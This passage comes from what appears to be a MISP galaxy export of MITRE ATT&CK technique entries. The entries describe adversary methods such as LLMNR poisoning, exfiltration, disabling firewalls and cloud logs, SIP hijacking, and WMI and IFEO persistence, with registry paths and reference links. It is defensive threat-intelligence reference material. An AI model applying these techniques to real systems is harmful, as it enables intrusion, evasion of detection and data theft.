  • related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1266" with estimative-language:likelihood-probability="almost-certain"

Table 5372. Table References

Links

https://attack.mitre.org/techniques/T1247

Acquire OSINT data sets and information - T1266

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1266).

Open source intelligence (OSINT) provides free, readily available information about a target while providing the target no indication they are of interest. Such information can assist an adversary in crafting a successful approach for compromise. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1266"

Acquire OSINT data sets and information - T1266 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1277" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1247" with estimative-language:likelihood-probability="almost-certain"

Table 5373. Table References

Links

https://attack.mitre.org/techniques/T1266

Acquire OSINT data sets and information - T1277

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1277).

Data sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1277"

Acquire OSINT data sets and information - T1277 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1266" with estimative-language:likelihood-probability="almost-certain"

Table 5374. Table References

Links

https://attack.mitre.org/techniques/T1277

Assess opportunities created by business deals - T1299

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1299).

During mergers, divestitures, or other period of change in joint infrastructure or business processes there may be an opportunity for exploitation. During this type of churn, unusual requests, or other non standard practices may not be as noticeable. (Citation: RossiMergers) (Citation: MeidlHealthMergers)

The tag is: misp-galaxy:mitre-attack-pattern="Assess opportunities created by business deals - T1299"

Table 5375. Table References

Links

https://attack.mitre.org/techniques/T1299

SSL certificate acquisition for trust breaking - T1338

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1338).

Fake certificates can be acquired by legal process or coercion. Or, an adversary can trick a Certificate Authority into issuing a certificate. These fake certificates can be used as a part of Man-in-the-Middle attacks. (Citation: SubvertSSL)

The tag is: misp-galaxy:mitre-attack-pattern="SSL certificate acquisition for trust breaking - T1338"

Table 5376. Table References

Links

https://attack.mitre.org/techniques/T1338

Identify resources required to build capabilities - T1348

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1348).

As with legitimate development efforts, different skill sets may be required for different phases of an attack. The skills needed may be located in house, can be developed, or may need to be contracted out. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Identify resources required to build capabilities - T1348"

Table 5377. Table References

Links

https://attack.mitre.org/techniques/T1348

Hardware or software supply chain implant - T1365

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1365).

During production and distribution, the placement of software, firmware, or a CPU chip in a computer, handheld, or other electronic device that enables an adversary to gain illegal entrance. (Citation: McDRecall) (Citation: SeagateMaxtor)

The tag is: misp-galaxy:mitre-attack-pattern="Hardware or software supply chain implant - T1365"

Table 5378. Table References

Links

https://attack.mitre.org/techniques/T1365

Test malware in various execution environments - T1357

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1357).

Malware may perform differently on different platforms (computer vs handheld) and different operating systems ([Ubuntu](http://www.ubuntu.com) vs [OS X](http://www.apple.com/osx)), and versions ([Windows](http://windows.microsoft.com) 7 vs 10) so malicious actors will test their malware in the environment(s) where they most expect it to be executed. (Citation: BypassMalwareDefense)

The tag is: misp-galaxy:mitre-attack-pattern="Test malware in various execution environments - T1357"

Table 5379. Table References

Links

https://attack.mitre.org/techniques/T1357

Conduct social engineering or HUMINT operation - T1376

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. Human Intelligence (HUMINT) is intelligence collected and provided by human sources. (Citation: 17millionScam) (Citation: UbiquityEmailScam)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering or HUMINT operation - T1376"

Table 5380. Table References

Links

https://attack.mitre.org/techniques/T1376

Spear phishing messages with malicious attachments - T1367

This technique has been deprecated. Please use [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).

Emails with malicious attachments are designed to get a user to open/execute the attachment in order to deliver malware payloads. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Spear phishing messages with malicious attachments - T1367"

Table 5381. Table References

Links

https://attack.mitre.org/techniques/T1367

Authorized user performs requested cyber action - T1386

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Clicking on links in email, opening attachments, or visiting websites that result in drive by downloads can all result in compromise due to users performing actions of a cyber nature. (Citation: AnonHBGary)

The tag is: misp-galaxy:mitre-attack-pattern="Authorized user performs requested cyber action - T1386"

Table 5382. Table References

Links

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

https://attack.mitre.org/techniques/T1386

Spear phishing messages with text only - T1368

This technique has been deprecated. Please use [Phishing](https://attack.mitre.org/techniques/T1566) where appropriate.

Emails with text only phishing messages do not contain any attachments or links to websites. They are designed to get a user to take a follow on action such as calling a phone number or wiring money. They can also be used to elicit an email response to confirm existence of an account or user. (Citation: Paypal Phone Scam)

The tag is: misp-galaxy:mitre-attack-pattern="Spear phishing messages with text only - T1368"

Table 5383. Table References

Links

https://attack.mitre.org/techniques/T1368

This technique has been deprecated. Please use [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002).

Emails with malicious links are designed to get a user to click on the link in order to deliver malware payloads. (Citation: GoogleDrive Phishing) (Citation: RSASEThreat)

The tag is: misp-galaxy:mitre-attack-pattern="Spear phishing messages with malicious links - T1369"

Table 5384. Table References

Links

https://attack.mitre.org/techniques/T1369

Unauthorized user introduces compromise delivery mechanism - T1387

This technique has been deprecated. Please use [Hardware Additions](https://attack.mitre.org/techniques/T1200) where appropriate.

If an adversary can gain physical access to the target’s environment they can introduce a variety of devices that provide compromise mechanisms. This could include installing keyboard loggers, adding routing/wireless equipment, or connecting computing devices. (Citation: Credit Card Skimmers)

The tag is: misp-galaxy:mitre-attack-pattern="Unauthorized user introduces compromise delivery mechanism - T1387"

Table 5385. Table References

Links

https://attack.mitre.org/techniques/T1387

Deliver Malicious App via Other Means - T1476

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.

Delivery methods for the malicious application include:

  • [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) - Including the mobile app package as an attachment to an email message.

  • [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.

  • Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)

Some Android malware comes with functionality to install additional applications, either automatically or when the adversary instructs it to.(Citation: android-trojan-steals-paypal-2fa)

The tag is: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476"

Table 5386. Table References

Links

https://attack.mitre.org/techniques/T1476

https://blog.trendmicro.com/trendlabs-security-intelligence/flappy-bird-and-third-party-app-stores/

https://blog.trendmicro.com/trendlabs-security-intelligence/user-beware-rooting-malware-found-in-3rd-party-app-stores/

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html

https://www.ibtimes.co.uk/danger-lurks-third-party-android-app-stores-1544861

https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/

Upload, install, and configure software/tools - T1362

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1362).

An adversary may stage software and tools for use during later stages of an attack. The software and tools may be placed on systems legitimately in use by the adversary or may be placed on previously compromised infrastructure. (Citation: APT1) (Citation: RedOctober)

The tag is: misp-galaxy:mitre-attack-pattern="Upload, install, and configure software/tools - T1362"

Table 5387. Table References

Links

https://attack.mitre.org/techniques/T1362

LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001

By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)

Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.

In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.

Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)

The tag is: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001"

Table 5388. Table References

Links

https://attack.mitre.org/techniques/T1557/001

https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution

https://github.com/Kevin-Robertson/Conveigh

https://github.com/SpiderLabs/Responder

https://github.com/nomex/nbnspoof

https://technet.microsoft.com/library/cc958811.aspx

https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response

https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning

Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003"

Table 5389. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1048/003

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689

Exfiltration Over Unencrypted Non-C2 Protocol - T1639.001

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). Adversaries may employ custom or publicly available encoding/compression algorithms (such as base64) or embed data within protocol headers and fields.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1639.001"

Table 5390. Table References

Links

https://attack.mitre.org/techniques/T1639/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html

Match Legitimate Name or Location - T1036.005

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.

The tag is: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"

Table 5391. Table References

Links

https://attack.mitre.org/techniques/T1036/005

https://docs.docker.com/engine/reference/commandline/images/

https://twitter.com/ItsReallyNick/status/1055321652777619457

https://www.elastic.co/blog/how-hunt-masquerade-ball

Match Legitimate Name or Location - T1655.001

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by giving artifacts the name and icon of a legitimate, trusted application (i.e., Settings), or using a package name that matches legitimate, trusted applications (i.e., com.google.android.gm).

Adversaries may also use the same icon of the file or application they are trying to mimic.

The tag is: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1655.001"

Table 5392. Table References

Links

https://attack.mitre.org/techniques/T1655/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html

Disable or Modify System Firewall - T1562.004

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.

Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004"

Table 5393. Table References

Links

https://attack.mitre.org/techniques/T1562/004

https://twitter.com/TheDFIRReport/status/1498657772254240768

Disable or Modify Cloud Firewall - T1562.007

Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004).

Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)

Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify Cloud Firewall - T1562.007"

Table 5394. Table References

Links

https://attack.mitre.org/techniques/T1562/007

https://expel.io/blog/finding-evil-in-aws/

https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/

Disable or Modify Cloud Logs - T1562.008

An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.

For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify Cloud Logs - T1562.008"

Table 5395. Table References

Links

https://attack.mitre.org/techniques/T1562/008

https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html

https://cloud.google.com/logging/docs/audit/configure-data-access

https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html

https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete

https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/

https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detectiondisruption/main.py

https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591

SIP and Trust Provider Hijacking - T1553.003

Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file’s origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)

Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)

  • Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg{SIP_GUID}</code> that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).

  • Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData{SIP_GUID}</code> that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.

  • Modifying the <code>DLL</code> and <code>Function</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}</code> that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).

  • Note: The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)

The tag is: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1553.003"

Table 5396. Table References

Links

http://www.entrust.net/knowledge-base/technote.cfm?tn=8165

https://attack.mitre.org/techniques/T1553/003

https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)

https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files

https://github.com/mattifestation/PoCSubjectInterfacePackage

https://msdn.microsoft.com/library/ms537359.aspx

https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx

https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

Windows Management Instrumentation Event Subscription - T1546.003

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer’s uptime.(Citation: Mandiant M-Trends 2015)

Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)

WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003"

Table 5397. Table References

Links

https://attack.mitre.org/techniques/T1546/003

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1

https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format—​mof-

https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf

https://www.secureworks.com/blog/wmi-persistence

https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf

Exfiltration to Text Storage Sites - T1567.003

Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as <code>pastebin[.]com</code>, are commonly used by developers to share code and other information.

Text storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)

Note: This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlight access to code repositories via APIs.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration to Text Storage Sites - T1567.003"

Table 5398. Table References

Links

https://attack.mitre.org/techniques/T1567/003

https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it

Executable Installer File Permissions Weakness - T1574.005

Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the <code>%TEMP%</code> directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Executable Installer File Permissions Weakness - T1574.005"

Table 5399. Table References

Links

https://attack.mitre.org/techniques/T1574/005

https://seclists.org/fulldisclosure/2015/Dec/34

https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/

Path Interception by Unquoted Path - T1574.009

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary’s executable to launch.

Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., <code>C:\unsafe path with space\program.exe</code> vs. <code>"C:\safe path with space\program.exe"</code>). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is <code>C:\program files\myapp.exe</code>, an adversary may create a program at <code>C:\program.exe</code> that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)

This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.

The tag is: misp-galaxy:mitre-attack-pattern="Path Interception by Unquoted Path - T1574.009"

Table 5400. Table References

Links

https://attack.mitre.org/techniques/T1574/009

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree

https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464

https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

Image File Execution Options Injection - T1546.012

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable></code> where <code><executable></code> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\</code>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)

